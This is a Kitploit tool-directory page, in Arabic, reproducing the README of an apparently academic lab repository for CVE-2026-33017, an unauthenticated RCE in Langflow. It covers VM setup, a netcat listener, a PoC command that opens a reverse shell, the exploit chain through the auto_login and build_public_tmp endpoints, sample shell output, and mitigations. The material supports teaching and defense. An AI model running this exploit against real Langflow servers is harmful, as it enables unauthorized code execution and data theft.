Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-33017 — مختبر تعليمي يوضح ثغرة تنفيذ الأوامر عن بُعد (RCE) غير المصادق عليها في Langflow عبر CVE-2026-33017، مع إعداد تلقائي للجهاز الافتراضي واستغلال PoC للحصول على قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/jorrit-vm/cve-2026-33017
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعدتطوير الحمولاتمختبرات وتدريب عملي
GitHubjorrit-vm/cve-2026-33017

CVE-2026-33017

مختبر تعليمي يوضح ثغرة تنفيذ الأوامر عن بُعد (RCE) غير المصادق عليها في Langflow عبر CVE-2026-33017، مع إعداد تلقائي للجهاز الافتراضي واستغلال PoC للحصول على قشرة عكسية.

1منذ 3 أشهرلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-33017 — Langflow RCE غير مصادق عليه

HoGent CyberSecurity II — اختبار الاختراق الشبكي والاستغلال (NPE)
السنة الأكاديمية 2025–2026

CVE CVSS Langflow


نظرة عامة

يحتوي هذا المستودع على بيئة مختبرية كاملة وعرض توضيحي لاستغلال CVE-2026-33017، وهي ثغرة حرجة لتنفيذ الأكواد عن بُعد (RCE) غير مصادق عليها في Langflow ≤ 1.8.1.

يمكن للمهاجم دون أي مصادقة تنفيذ أكواد Python عشوائية على الخادم عبر نقطة النهاية /api/v1/build_public_tmp/{flow_id}/flow، وذلك لأن إدخال المستخدم يُمرَّر مباشرة إلى دالة exec() في Python دون أي عزل (sandboxing) أو تحقق.

⚠️ إخلاء مسؤولية: هذا المستودع مخصص حصريًا للأغراض التعليمية في بيئة مختبرية خاضعة للتحكم. استخدمه فقط على الأنظمة التي لديك إذن صريح لاستخدامها.


البنية المعمارية

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│                   HOST MACHINE                      │
│                                                     │
│  ┌──────────────────┐     ┌───────────────────────┐ │
│  │  Langflow-Victim │     │    Kali-Attacker      │ │
│  │  Ubuntu 22.04    │     │    Kali Linux         │ │
│  │  192.168.56.101  │◄────│    192.168.56.100     │ │
│  │  Langflow 1.8.1  │     │    PoC exploit tool   │ │
│  │  port 7860       │     │    + internet (NAT)   │ │
│  └──────────────────┘     └───────────────────────┘ │
│          Host-only netwerk: 192.168.56.0/24         │
└─────────────────────────────────────────────────────┘

هيكل المستودع

root@kitploit:~
CVE-2026-33017/
├── README.md # Dit bestand
├── LICENSE
├── .gitignore
├── docs/
│ └── stappenplan.md # Volledige deployment & aanvalsgids
└── scripts/
├── setup_vms.sh # Fase 1: VirtualBox VMs aanmaken (HOST)
├── setup_victim.sh # Fase 2: Langflow 1.8.1 installeren (Ubuntu VM)
└── setup_attacker.sh # Fase 3: PoC tool installeren (Kali VM)

بدء سريع

المتطلبات

  • VirtualBox 7.x مع VBoxManage في PATH
  • Ubuntu_22.04-VB-64bit.vdi → أعد تسميته إلى ubuntu-22.04.vdi
  • Kali_Linux-VB-64bit.vdi → أعد تسميته إلى kali-linux.vdi
  • ضع ملفي VDI في نفس المجلد الذي يحتوي على setup_vms.sh

المرحلة 1 — إنشاء الأجهزة الافتراضية (على المضيف)

root@kitploit:~
bash scripts/setup_vms.sh

المرحلة 2 — تكوين الجهاز الافتراضي الضحية (على Ubuntu VM)

root@kitploit:~
# بيانات الدخول: osboxes / osboxes.org
sudo bash scripts/setup_victim.sh

المرحلة 3 — تكوين الجهاز الافتراضي المهاجم (على Kali VM)

root@kitploit:~
# بيانات الدخول: osboxes / osboxes.org
sudo bash scripts/setup_attacker.sh

تنفيذ الهجوم

الطرفية 1 — مستمع الـ reverse shell:

root@kitploit:~
nc -lvnp 4444

الطرفية 2 — الاستغلال:

root@kitploit:~
cd ~/CVE-2026-33017-Langflow-RCE-PoC
source venv/bin/activate
python3 cve-2026-33017.py 192.168.56.101 --shell \
  --lhost 192.168.56.100 --lport 4444

يتم تثبيت أداة PoC تلقائيًا بواسطة setup_attacker.sh.
PoC المستخدمة: omer-efe-curkus/CVE-2026-33017-Langflow-RCE-PoC


كيف يعمل الاستغلال

الخطوةنقطة النهايةالوصف
1GET /api/v1/auto_loginيحصل على رمز JWT للمستخدم الفائق (AUTO_LOGIN=true)
2POST /api/v1/flows/ينشئ تدفقًا عامًا جديدًا عبر API
3POST /api/v1/build_public_tmp/{id}/flowيحقن CustomComponent بكود Python خبيث
4exec() في validate.py:397يتم تنفيذ الكود دون عزل — RCE

دليل التنفيذ

[] Fetching access token... [+] Public Flow ID created: 11571add-6416-4226-b8e6-844202cce6ff [] Sending reverse shell to connect back to 192.168.56.100:4444

Listener (Terminal 1): connect to [192.168.56.100] from (UNKNOWN) [192.168.56.101] 36160 $ whoami user $ hostname e37190a2f147 $ find /app -name "*.db" /app/.venv/lib/python3.12/site-packages/langflow/langflow.db


التخفيف

  • التحديث إلى Langflow ≥ 1.9.0 — يزيل معامل data القابل للاستغلال
  • عطّل LANGFLOW_AUTO_LOGIN في بيئة الإنتاج
  • قيّد الوصول الشبكي إلى المنفذ 7860 عبر جدار الحماية
  • ضع Langflow خلف وكيل عكسي يتطلب مصادقة

المراجع

  • NVD — CVE-2026-33017
  • GitHub Advisory GHSA-vwmf-pq79-vjvx
  • Sysdig — Exploited in 20 hours
  • SonicWall — Technical Analysis
  • PoC door omer-efe-curkus

HoGent — Toegepaste Informatica — CyberSecurity II — 2025–2026

تنزيل الأداة